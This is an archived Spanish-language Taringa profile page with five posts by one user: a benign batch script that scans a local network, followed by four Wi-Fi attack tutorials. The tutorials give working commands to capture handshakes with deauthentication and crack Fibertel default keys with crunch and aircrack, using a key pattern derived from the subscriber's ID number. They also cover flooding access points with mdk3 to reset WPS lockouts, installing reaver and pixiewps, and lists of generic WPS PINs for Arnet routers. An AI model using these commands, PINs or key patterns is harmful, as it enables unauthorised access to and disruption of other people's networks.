e

elocomoi

Usuario (Argentina)

Primer post: 11 jul 2015
5
Posts
299
Puntos totales
29
Comentarios
Detectar intrusos en tu red
Detectar intrusos en tu red
Hazlo Tu MismoporAnónimoFecha desconocida

Antes que nada bienvenidos a este post un poco diferente donde primero presento una herramienta para windows, (lo cual es raro pero bueno) y donde ademas hay muuuuchas herramientas que hacen lo mismo (e incluso mejor), son mas elegantes y todo. Pero a diferencia de las demas esta es open source (oupen surs guacho) y cualquiera la puede modificar, Esta herramienta es un remake de otro aporte muy muy copado que se realizo en ZonaSystem.com.... En fin aca una captura del inicio del programa, es bastante intuitivo y para usarlo no hay que tener mucha idea, solo como averiguar tu direccion ip en fin el código esta abajo, tienen que pegarlo en un bloc de notas y guardarlo con cualquier nombre y la extensión .bat, ejemplo : escaner.bat En fin el código del ejecutable es: @echo off :menu del fichero*.tmp cls Title Escaner v2.1 - By marcos2612 color 0A echo. echo Para poder trabajar correctamente esta aplicacion echo necesita ejecutarse como Administrador echo. echo -) El nombre de su equipo es: [ %computername% ] echo -) Su usuario actual es: [ %username% ] echo. echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» echo ºÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»º echo ºº Escaner v 2.1 ºº echo ºº Deteccion de intrusos de Red Local ºº echo ºº By marcos2612 -- basado en el script ºº echo ºº presentado en ZonaSystem.com ºº echo ºÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼº echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ echo. echo 1. Escanear toda la red (todas las ip 1-254) echo 2. Escanear un rago determinado de ips echo 3. Consulta MAC address de la tabla ARP echo 4. Consulta una direccion IP determinada echo 5. Consulta NETSTAT echo 6. Acerca de este escaner... echo 7. Salir echo. echo Pulse el numero correspondiente para la accion requerida: set/p opc= if %opc%==1 goto scantotal if %opc%==2 goto scanrango if %opc%==3 goto arp if %opc%==4 goto ping if %opc%==5 goto netstat if %opc%==6 goto aboutme if %opc%==7 goto salir :si goto menu :no del fichero.tmp exit :scantotal cls echo ============================ echo Escaneo de toda la Red local echo ============================ echo ( Para volver al Menu principal, escriba: salir ) echo. echo Introduzca los 3 primeros octetos de la IP echo (Ejemplo: Si 192.168.0.1 los 3 primeros serian 192.168.0) set /p ip= if %ip%==salir goto menu cls echo ----------------------------------------------- echo [Escaneando toda la Red de area local (%ip%)] echo ----------------------------------------------- echo Por favor espere un momento... echo. FOR /L %%a IN (1,1,254) DO ( echo [ ESCANEANDO IP %%a de 254 ] - [%ip%.%%a] ping -w 50 -n 1 %ip%.%%a | find "Respuesta" && @ECHO IP Conectada --- [%ip%.%%a] >> fichero1.tmp ping -w 50 -n 1 %ip%.%%a | find "agotado" && @ECHO IP Sin Respuesta --- [%ip%.%%a] >>fichero2.tmp ) cls if exist fichero*.tmp ( echo ---------------------------- echo IPS listadas con Exito! echo ---------------------------- echo. echo ++++++++++++++++++++ echo ++ IPs Conectadas ++ echo ++++++++++++++++++++ echo. type fichero1.tmp echo. echo _________________________________________________________ echo. echo +++++++++++++++++++++++ echo ++ IPs Sin Respuesta ++ echo +++++++++++++++++++++++ echo. type fichero2.tmp del fichero*.tmp ) else ( echo -------------------------- echo IPs No encontradas echo -------------------------- echo. echo Intentelo de nuevo o vuelva a introducir una direccion IP valida del fichero*.tmp ) echo. echo _________________________________________________________ echo. echo 1. Volver a escanear toda la red local echo 2. Volver al Menu principal echo. echo Pulse el numero correspondiente para la accion requerida: set/p opc= if %opc%==1 goto scantotal if %opc%==2 goto menu :scanrango cls echo --------------------------------- echo Introduce un rango de IP clase C echo --------------------------------- echo ( Para volver al Menu principal, escriba: salir ) echo. echo Introduzca los 3 primeros octetos de la IP echo (Ejemplo: 172.16.1) set /p ip= if %ip%==salir goto menu echo. echo Desde [MAX. 254] set /p r= if %r%==salir goto menu echo Desde %r%, hasta: set /p h= if %h%==salir goto menu cls echo. echo ------------------------------------------------------------------- echo [Escaneando rango de IPs: Desde %r% hasta %h% de la red (%ip%.0)] echo ------------------------------------------------------------------- echo Por favor espere un momento... echo. FOR /L %%a IN (%r%,1,%h%) DO ( echo [ ESCANEANDO IP %%a de %h% ] - [%ip%.%%a] ping -w 50 -n 1 %ip%.%%a | find "Respuesta" && @ECHO IP Conectada --- [%ip%.%%a] >> fichero1.tmp ping -w 50 -n 1 %ip%.%%a | find "agotado" && @ECHO IP Sin Respuesta --- [%ip%.%%a] >>fichero2.tmp ) cls if exist fichero*.tmp ( echo ---------------------------- echo IPs listadas con Exito! echo ---------------------------- echo. echo ++++++++++++++++++++ echo ++ IPs Conectadas ++ echo ++++++++++++++++++++ echo. type fichero1.tmp echo. echo _________________________________________________________ echo. echo +++++++++++++++++++++++ echo ++ IPs Sin Respuesta ++ echo +++++++++++++++++++++++ echo. type fichero2.tmp del fichero*.tmp ) else ( echo -------------------------- echo IPs No encontradas echo -------------------------- echo. echo Intentelo de nuevo o vuelva a introducir una IP valida del fichero*.tmp ) echo. echo _________________________________________________________ echo. echo 1. Volver a escanear otro rango echo 2. Volver al Menu principal echo. echo Pulse el numero correspondiente para la accion requerida: set/p opc= if %opc%==1 goto scanrango if %opc%==2 goto menu :arp cls echo ==================== echo Menu de la tabla ARP echo ==================== echo 1. Consultar tabla ARP echo 2. Borrar todos los host asociados a la tabla ARP actual echo 3. Volver al Menu principal echo. echo Pulse el numero correspondiente para la accion requerida: set/p opc= if %opc%==1 goto arpactu if %opc%==2 goto arpborra if %opc%==3 goto menu :arpactu cls echo -------------------------- echo Mostrando tabla ARP actual echo -------------------------- arp -a echo _________________________________________________________ echo. echo 1. Volver al Menu ARP echo 2. Volver al Menu principal echo. echo Pulse el numero correspondiente para la accion requerida: set/p opc= if %opc%==1 goto arp if %opc%==2 goto menu :arpborra cls echo -------------------- echo Borrado de tabla ARP echo -------------------- arp -d * echo _________________________________________________________ echo. echo 1. Volver al Menu ARP echo 2. Volver al Menu principal echo. echo Pulse el numero correspondiente para la accion requerida: set/p opc= if %opc%==1 goto arp if %opc%==2 goto menu :netstat cls echo ============= echo Menu NETSTAT echo ============= echo. echo 1. Muestra detallada NETSTAT echo 2. Especifique un protocolo a mostrar en NETSTAT echo 3. Volver al Menu principal set/p opc= if %opc%==1 goto detalladanetstat if %opc%==2 goto protonetstat if %opc%==3 goto menu :detalladanetstat cls netstat -a -b -e -n -o -r -s -v echo _________________________________________________________ echo. echo 1. Volver al Menu NETSTAT echo 2. Volver al Menu principal echo. echo Pulse el numero correspondiente para la accion requerida: set/p opc= if %opc%==1 goto netstat if %opc%==2 goto menu :protonetstat cls echo --------------------------------- echo Analizar un protocolo determinado echo --------------------------------- echo ( Para volver al Menu principal, escriba: salir ) echo. echo Especifique un protocolo a anlizar: echo (Ejemplo: TCP, UDP, TCPv6 o UDPv6) set/p proto= if %proto%==salir goto menu if %proto%==%proto% goto protonetstatmostrar :protonetstatmostrar netstat -a -p %proto% echo _________________________________________________________ echo. echo 1. Volver a analizar un protocolo con NETSTAT echo 2. Volver al Menu NETSTAT echo 3. Volver al Menu principal echo. echo Pulse el numero correspondiente para la accion requerida: set/p opc= if %opc%==1 goto protonetstat if %opc%==2 goto netstat if %opc%==3 goto menu :ping cls echo ====================================================== echo Consultar la respuesta de una direccion IP determinada echo ====================================================== echo ( Para volver al Menu principal, escriba: salir ) echo. echo Nota: Si la IP introducida, no muestra nada en pantalla, echo significa que no esta respondiendo a la solicitud de echo ICMP, ping. echo. echo Introduzca la direccion IP a consultar: set/p pingip= echo. if %pingip%==salir goto menu ping %pingip% | find "TTL" && @ECHO +++++ { La IP [%pingip%] Responde al Ping } +++++ echo _________________________________________________________ echo. echo 1. Volver a consultar una IP determinada echo 2. Volver al Menu principal echo. echo Pulse el numero correspondiente para la accion requerida: set/p opc= if %opc%==1 goto ping if %opc%==2 goto menu :aboutme cls echo. echo [ Para que sirve ? ] echo -------------------- echo Este escaner es una herramienta que mediante una serie de procesos e instrucciones echo permite escanear y consultar las IPs activas de la Red de area local, echo entre otras cosas. echo. echo Este script esta basado en el script presentado en ZonaSystem.com y modificado por mi echo. echo º------------------º echo º By marcos2612 º echo º arg-wireless.com º echo º Escaner v2.1 º echo º------------------º echo. echo Deseas volver al Menu principal? (S/N) set/p var= if %var%==s goto si if %var%==n goto no :salir del fichero*.tmp exit En fin eso es todo, gracias por pasar, y como siempre si tienen alguna pregunta, duda o bardeada aguante el quilombo vieja besitos en las pompis para todos pasate por mis otros aportes: ataque wps offline vulnerabilidades router arnet vulnerabilidades claves fibertel

0
0
V
Vulnerabilidades claves Fibertel Argentina
LinuxporAnónimo8/22/2015

Antes que nada aclarar que este post es meramente informativo y lo que hagan con esa info ya es problema suyo. La vulnerabilidad en cuestión es para las claves POR DEFECTO, no para cualquiera, sino la pudieron reventar es porque la cambiaron. Las redes vulnerables siempre se llaman: Fibertel Wi-Fi xxxx (xxxx son numeros o letras random) Este post en si hiba a ser muuuuy corto asique decidi hacer el procedimieto completo: Si sabes como obtener un handshake y probarlo con diccionarios y demas te recomiendo que bajes hasta las letras azules ahi estan las vulnerabilidades Ahora bien si lees esto es porque no tenes idea de como carajo se obtiene un handsake, si no sabes lo que es un handshake: Handshake: Es una palabra inglesa que significa apretón de manos, esto llevado al tema que nos interesa, digamos que es el saludo que hace un router wifi a un equipo que le pide conexión. Es decir un ordenador cuando va a acceder a internet wifi, le envía una información al router donde le dice: Soy un equipo que quiere acceder y esta es la clave. Por lo tanto de esta absurda descripción sacamos que en esa conexión está incluida la clave que se necesita para poder conectarnos a internet. Cuando nosotros le lanzamos un ataque a ese router, lo que realmente hacemos para capturar ese handshake es desconectar al equipo del router y coger esos datos cuando intente reconectar. Ese corte realmente es inapreciable para alguien que esta navegando en la web, digamos que es un microcorte. Por lo tanto podemos pensar que solo con el handshake ya podemos conectarnos a esa red, pero eso no es del todo así. En el handshake va un montón de información, entre ella la clave, pero cifrada. Cae de maduro que para obtener el handshake tiene que haber al menos 1 cliente conectado Bien sin mas seguimos: Yo voy a usar a mi querido kali, y una tarjeta dedicada (tp link wn-722n): Bien ahora una vez en kali lo que hacemos es poner la tarjeta en modo monitor: despues escaneamos las redes y seleccionamos nuestra victima: airodump-ng -c CANAL --bssid MACVICTIMA -w NOMBREDELARCHIVO mon0 mon0 es la tarjeta en modo monitor. despues podemos lanzar una infinidad de ataques, el mas usado es: ayreplay-ng --deauth 30 -a MACVICTIMA -c MACCLIENTE mon0 la opcion -c es opcional tranquilamente funcionaria con la mac del router desautenticando a todos los clientes, pero es recomendable trabajar asi, Cuando obtengamos el handshake nos aparece algo asi: OK esa ultima imagen no es mia, pasa que no tenia clientes la red y queria terminar el tutorial Ahora bien una vez obtenido el handshake, pueden tambien pasarlas por un diccionario pero me parece al vicio debido a que ocupan lugar, y para eso esta crunch. Bueno sin mas preambulos las vulnerabilidades: 1) Como todos sabemos las claves (en argentina) empiezan con 004 o 014. 2) la longitud de estas claves es de 10 (DIEZ) digitos (a eso se le resta el prefijo ya sea 014 o 004) 3) Las claves son NUMÉRICAS. 4) la clave se forma con: prefijo(014 o 004)+numero del documento del clente sin el ultimo digito. o sea que si mi documento es 12345678 y el prefijo 014 la clave es: 0141234567 se entiende? Bien dicho esto lo que hay que analizar es lo siguiente: solo tenes que reventar 7 digitos numericos o sea que ya sea que uses gpu o cpu con una maquina decente tardas a lo maximo 8 - 10 hs en el peor de los casos ( si usas gpu con una tarjeta grafica copada) tardas 1-2 hs lo maximo. Siempre recomiendo usar linux para crackear pero bueno nadie me da un tronco de bola, asique para los que quieran usar aircrack y crunch para reventar la clave en windows al final del post les dejo un programa lo único que tienen que hacer es seguir las instrucciones alli asignadas. Ahora para los que quieran pasar la clave por kali usando Crunch y aircrack (debidos a que como yo son pobres y su tarjeta gráfica da angustia ) el comando es mas o menos asi (para el prefijo 014): crunch 0123456789 10 10 -f 014@@@@@@@ | aircrack-ng -a 2 archivo.cap -b macVictima -w - sino para el prefijo 004 es: crunch 0123456789 10 10 -f 004@@@@@@@ | aircrack-ng -a 2 archivo.cap -b macVictima -w - Cabe aclarar que hay q probarlos de a uno por vez, Bueno eso es todo. Sin mas que decir pasate por mis otros aportes Cualquier pregunta, puteada o bardeada aguante el quilombo vieja, besitos en las pompis para todos

0
37
resetear remotamente el protocolo wps
resetear remotamente el protocolo wps
LinuxporAnónimo8/23/2015

Bueno antes que nada bienvenidos de nuevo, en este aporte quisiera ayudarlos con un problema muuuuuy recurrente (al menos para mi en lo que se trata la explotación de el protocolo wps) , peeeero hay que tener en cuenta que no funciona para tooodos los routers. Dicho de otra forma cuando se bloquea el wps y no podemos hacer nada mas que esperar, bueno papus, linces y lincesas, eh aquí una solución para los que como yo se re cag*n de odio con esto, tratar de reiniciar el modem/router para poder seguir probando pin con reaver, o con lo que sea. Tener en cuenta que no funciona con todos los routers La idea o concepto teorico seria: sobrecargar el AP destino con datos inútiles , causando así que se congele y se reinicie. Este ataque usa mdk3 y un conjunto de herramientas aparte, CADA UNA CORRIENDO EN UNA TERMINAL DIFERENTE, no se si se entiende o me alcanzo a explicar. Bueno sin mas vamos al tutorial: Aclaro que este tutorial esta pensado para kali linux 1.10 o menor (el 2.0 no lo probe mucho por ahora, pero prometo actualizarme pronto) *abrir una terminal y tipear: mdk3 monX a -a xx:xx:xx:xx:xx:xx -m Este inunda la AP objetivo con clientes falsos /----------------------------------------- *abrir otra terminal y tipear: mdk3 monX m -t xx:xx:xx:xx:xx:xx Esto hace que el fracaso de Michael , deteniendo todo el tráfico inalámbrico . Sin embargo , esto sólo funciona si el objetivo AP soporta TKIP . (Puede ser AES + TKIP ) /----------------------------------------- *abrir otra terminal y tipear: mdk3 monX d -b blacklist -c X Esto mantiene un deauth continua en la red. Si este ataque no se inicia, hacer un documento de texto en blanco en la carpeta raíz (root) denominada blacklist . Déjelo vacío MDK3 rellena automáticamente la lista. /----------------------------------------- *abrir otra terminal y tipear: mdk3 monX b -t xx:xx:xx:xx:xx:xx -c X Este inunda un montón de puntos de acceso falsos para cualquier cliente en el rango ( solamente eficaces para los clientes de Windows y tal vez algunos otros dispositivos , Macs están protegidos contra esta ) /----------------------------------------- *para corroborar si el ataque dio resultado: wash -i monX -C -c canal Y allí verifican si la red en cuestión se desbloqueo (en la columna donde dice wps-locked tiene que decir no) Por favor, ten en cuenta que esto es SOLO para ambientes contrloados, no uses esto en una red que no sea la tuya o que no tiene permiso para usarlo . Si el propietario se entera la cosa puede terminar en serios problemas legales . una vez mas te invito a pasar por mis otros aportes: Ejecutable open source para verificar quien esta conectado a tu red ataque wps offline vulnerabilidades router arnet vulnerabilidades claves fibertel Y si tienen alguna pregunta, puteada o bardeada aguante el quilombo vieja, besitos en la soretera para todos

0
2
ataque wps offline
ataque wps offline
LinuxporAnónimo7/16/2015

Antes que nada bienvenidos al post. en este humilde tutorial les traigo un nuevo ataque que promete ser la cenicienta del baile ya que saca las claves en 10 / 15 segundos si el router es vulnerable Primero: este ataque no es 100% efectivo de las veces que lo probé (y lo pude hacer andar) casi nunca me tiro un pin (un par de veces nomas) pasa que este ataque es una vulnerabilidad a ciertos modems, decubierta por Dominique Bongard Los enlaces externos estan separados por espacios porque sino taringa no me deja publicar Bien dicho y aclarado esto vamos a empezar: Que necesitan: *distro linux (yo trabaje con kali papa) *reaver (mod dedicado): https:// github. com /t6x / reaver -wps- fork- t6x *pixiewps: https:// github .com /wiire / pixiewps *modem vulnerable: aca les dejo una lista de los mdems que a la fecha estan verificados: (fíjate en la Fuente de información, ahi hay un documento de google guachen) Bien, para instalarlo (en Kali Linux) se descargan los repositorios.zip antes mencionados ya sea con wget o desde Internet y los extraen, después: cd (ruta a la carpeta reaver-wps-fork-t6x*/) cd src/ chmod 755 configure ./configure make sudo make install ************* terminado de instalar el reaver vamos con pixiewps*********** primero actualizamos las librerias: sudo apt-get install libssl-dev sudo apt-get install libpcap-dev sudo apt-get install libsqlite3-dev depues ~/pixiewps$ cd src ~/pixiewps/src$ make ~/pixiewps/src$ sudo make install una vez listo eh instalado, ya tamos listos papu ahora lo que queda es reventar el modem. Les dejo 2 videos que hacen lo mismo de forma diferente: (aclaración no son míos, simplemente los comparto porque están buenos) link: https://www.youtube.com/watch?v=T7OGcLzouYc Este esta en ingles pero si le seguis la coriente en lo que hace si escuchar queda bastante claro: link: https://www.youtube.com/watch?v=8f6oClT7Wp4 Pasate por mis otros aportes si te pinta ataque wps offline vulnerabilidades router arnet vulnerabilidades claves fibertel Buen eso es todo, espero que les haya servido y si tienen alguna duda, pregunta o bardeada aguante el quilombo vieja. Besitos en las nalgas para todos

160
0
V
Vulnerabilidades Router arnet
LinuxporAnónimo7/11/2015

Como bien dice el titulo todos llegaron porque están un poquito podridos de renegar con los diccionarios y el bruteforce o tratar de probar un pin y pegarle con reaver para reventar un password Antes que nada si sos un moralista del orto no jodas y tomatelas, aca estamos solamente para brindar información a los clientes de arnet sobre las vulnerabilidades de los routers y a los que no son clientes... esteeee, bueno.... para que se informen a algún cliente que conozcan . Vamos a tratar de abarcar la mayor cantidad de temas posibles digo vamos porque al tema si bien lo empiezo yo lo hacemos todos, colaborando con lo que a mi se me pase (que de verdad es mucho). Una cosa mas: no esperen soluciones magicas, ni scripts super geniales porque no los hay solo comparto esto a modo informativo si alguien sabe de algo mas fomentemos el conocimiento colectivo y nos apoyemos entre todos, como los pibes de arg-wireles empezaron tratando de armar un patrón de claves y terminaron creando un script de vulnerabilidades (que mas abajo esta si ya se, no sean ansiosas). Dicho esto seguimos A la fecha (09/07/2015) están los siguientes routers (WIFI solamente) segun la pagina de arnet. Los modems se van a ir listando junto con sus vulnerabilidades y posibles puntos de quiebre A los enlaces que dejo hay que borrarle los espacios porque sino no me dejan publicar en taringa ---------------------------------------------*ADB *--------------------------------------------- **************************PDG-A4001N/ADB AV 4001N***************************** En este hay varios puntos segun se recorre la web. Los 2 mas viables (ami modo de ver) son ********************************modo 1************************************ Si ven AP del tipo WiFi-Arnet XXXX cuyo modem es el antes mencionado, deberian provar cierto algoritmo (pueden haber cambiado la clave, pero uno nunca sabe) https:// bitbucket. org/dudux/ adbpirelli/get /79eb1ce32d 51.zip la carpeta es un zip bajado desde github, para el proyecto completo: https:// bitbucket. org/dudux/ adbpirelli el script no es creado por mi simplemente lo comparto para mas informacion remitirse a: http://ednolo .alumnos .upv. es/?p= 1883 para los que no quieren cag*rse leyendo es una vulnerabilidad encontrada a principios de este año (2015) y publicada a fin de meterles presion para que actualicen el firmware ( si tenes este modem y esta clave por defecto cambiala ya!!) las macs soportadas son 000827 ----- 001CA2 ----- 001D8B ----- 00:22:33 0013C8 ----- 008C54 ----- 3039F2 ----- 3039F2 0017C2 ----- 74888B ----- 842615 ----- A4526F 00193E ----- A45DA1 ----- D0D412 ----- D4D184 DC0B1A ----- F0842F si no sabes ingles y queres seguir leyendo te recomiendo que leas el post de arg-wireless http:// arg-wireless .com .ar /index. php?topic =1006.0 ahi estan las versiones linux y las versiones para windows (aunque si queres laburar de verdad es recomendable una distro dedicada ya sea Kali - wifiway - wifislax - beini - etc (basicamente linux). Si por esas casualidades el script no te funciona en windows hay que editarle una linea para evitarte el barullo descargalo de aca (SOLO EL SCRIPT DE WINDOWSSSS, mas arriba les deje todo el repositorio) ************************************modo 2************************************* WPS activado por defecto ¡VARIOS PINs GENERICOS POSSIBLES! 16538061 16702738 18355604 88202907 73767053 43297917 19756967 información complementaria El PIN 16538061 es el más común y se ha visto en todos los tipos de bssid y firmwares. Al hacer un update del firmware el PIN se cambia. El routeur responde muy bien a las peticiones de reaver y se puede añadir "-d 0" para acelerar el ataque Aquí les dejo los PIN(s) organizado según su frecuencia para los 4 tipos de bssid conocidos > 30:392 > 16538061 16702738 18355604 88202907 73767053 43297917 19756967 74:88:8B > 43297917 73767053 88202907 16538061 16702738 18355604 19756967 A4:52:6F > 16538061 88202907 73767053 16702738 43297917 18355604 19756967 DC:0B:1A > 16538061 16702738 18355604 88202907 73767053 43297917 19756967 ---------------------------------------------*Arris*--------------------------------------------- **************************ARRIS WTM652 ***************************** *sin información acerca de este router, se agradece cualquier aporte ------------------------------------------------*Pirelli*--------------------------------------------- * **************************Pirelli WiFi DRG A125G ***************************** Essid= Wi-Fi Arnet - clave ARNET (wep) (en la vida esto CASI nunca funciona) aclaro el casi porque yo lo vi 2 (si dos veces) en dos lugares distintos, asique no lo descarto pero es rarisimo de ver este a su vez es el modem mas inseguro y peligroso de todos (si es que sos el que paga claro, sino se hacen una fiesta con vos y tu red), pasa que el echo de la clave wep y basica es el de menos relevancia, para mas informacion remitirse a: http:// www.coresecurity .com/ advisories/ vulnerabilidades-Arnet-wifi (sino me voy a volver viejo explicando, lean el apartado 8 del documento: Descripción y prueba técnica de las vulnerabilidades.) Estas vulnerabilidades (al día de hoy 09/07/2015) SIGUEN ESTANDO SIN SOLUCIONNN lo que da la pauta de que a arnet los clientes le soban la ..... p/d si por casualidad le sacaste la clave a este modem deberias leer esto, te va a interesar: http:// arg-wireless .com. ar/index. php ?topic=687.0 Si aun asi despues de leer estos 2 artículos pensas que no tenes que cambiar tu módem (o minimamente actualizar tu firmware) entonces no te quejes cuando haya 200 negros (como yo) colgados de tu red ---------------------------------------------*Huawey*------------------------------------------------ **************************Huawei HG520 ***************************** hace algún tiempo ya se descifro el algoritmo mac2wepkey que usaban estos modems desde la versión 3.10 a la 3.18 (en el firmware no) pero eso es historia ya porque lo actualizaron hace muuucho, si alguien le interesa no tiene mas que googlearlo **************************Huawei HG520b ***************************** *sin información acerca de este router, se agradece cualquier aporte ************************** Huawei HG630***************************** *sin información acerca de este router, se agradece cualquier aporte ---------------------------------------------*Zyxel*------------------------------------------------ ************************** ZYXEL VMG1312***************************** lo unico que puedo decir es que trae wps activo por defecto segun mi experiencia *Se agradece cualquier dato que se pueda aportar / mejorar **************************ZYXEL P660HW ***************************** Personalmente yo tengo este modem, y la verdad tanto como bueno no ses, hasta donde se no tiene firmware actualizado al dia de hoy ( la ultima actualizacion data del 2010) asique si por esas casualidades encontras algún programa (de esos que parecen de mentira de antes del 2010 ni te gastes porque ya lo parchearon al bug) , las rom y los archivos bin están en las librerías de la pagina oficial de zyxel, quien la necesite no tiene mas que googlearla. *Se agradece cualquier dato que se pueda aportar / mejorar ************************** ZYXEL VMG1312 B10B***************************** lo unico que puedo decir es que trae wps activo por defecto segun mi experiencia *Se agradece cualquier dato que se pueda aportar / mejorar -----------------------------------------------------ZTE-------------------------------------------------- **************************ZTE H108L ******************************** ESSID: WiFi-Armet-NNNN (N= numeros o letras en minúsculas /No tienen nada que ve con la MAC) BSSID: 9C2:4B:XX:XX:XX Espacio de BSSID: 9C2:4B:00:00:00 - 9C2:4BFFF Marca: ZTE Corporations Cifrado: WPA2 CCMP PSK WPS: Activo! 13419622 cabe aclarar que las veces que me tope con este modem (4 talvez 5 ) siempre lo revente en 30 seg con el mismo pin Cabe aclarar que este modem sabe venir (si hoy 2015) con clave wep (ARNET) aunque es muyyy raro de ver yo lo vi en la casa de una amiga y hasta el dia de hoy pienso la alegria de sus vecinos. *Se agradece cualquier dato que se pueda aportar / mejorar ------------------------------------------------------------------------------------------------------------------------ una cosa mas, a quienes les interese hay un par de base de datos de pin segun los 3 primeros digitos de una mac (si a alguien le interesa dejo el link) http:// wpsdb. site40 .net/ dejo ademas un vídeo para poder buscar por essid (nombre generico de una red, ej TpLink_XXXX) y si van a trabajar con wps les recomiendo visitar el foro, esta en ingles pero ay muuuchas heramientas interesantes https:// github. com/ 0x90/ wps-scripts y si no sabes ingles pasate igual miras las herramientas y desp las googleas en español para ver de que se tratan, la verdad estan muy buenas. Si me equivoque en algo las criticas constructivas son mas que bien recibidas y agradecidas. La idea de esto es que entre todos nos vamos ayudando y así poder completar los huecos, gracias por su visita, y si les gusto (o no) comenten puteen y demás, y al que le pinte tire un par de puntos que siempre son mas que bienvenidos jajaja , eso es todo por ahora gracias por su tiempo Si pinta pasate por mis otros aportes ataque wps offline

139
20
PosteameloArchivo Histórico de Taringa! (2004-2017). Preservando la inteligencia colectiva de la internet hispanohablante.

CONTACTO

18 de Septiembre 455, Casilla 52

Chillán, Región de Ñuble, Chile

Solo correo postal

© 2026 Posteamelo.com. No afiliado con Taringa! ni sus sucesores.

Contenido preservado con fines históricos y culturales.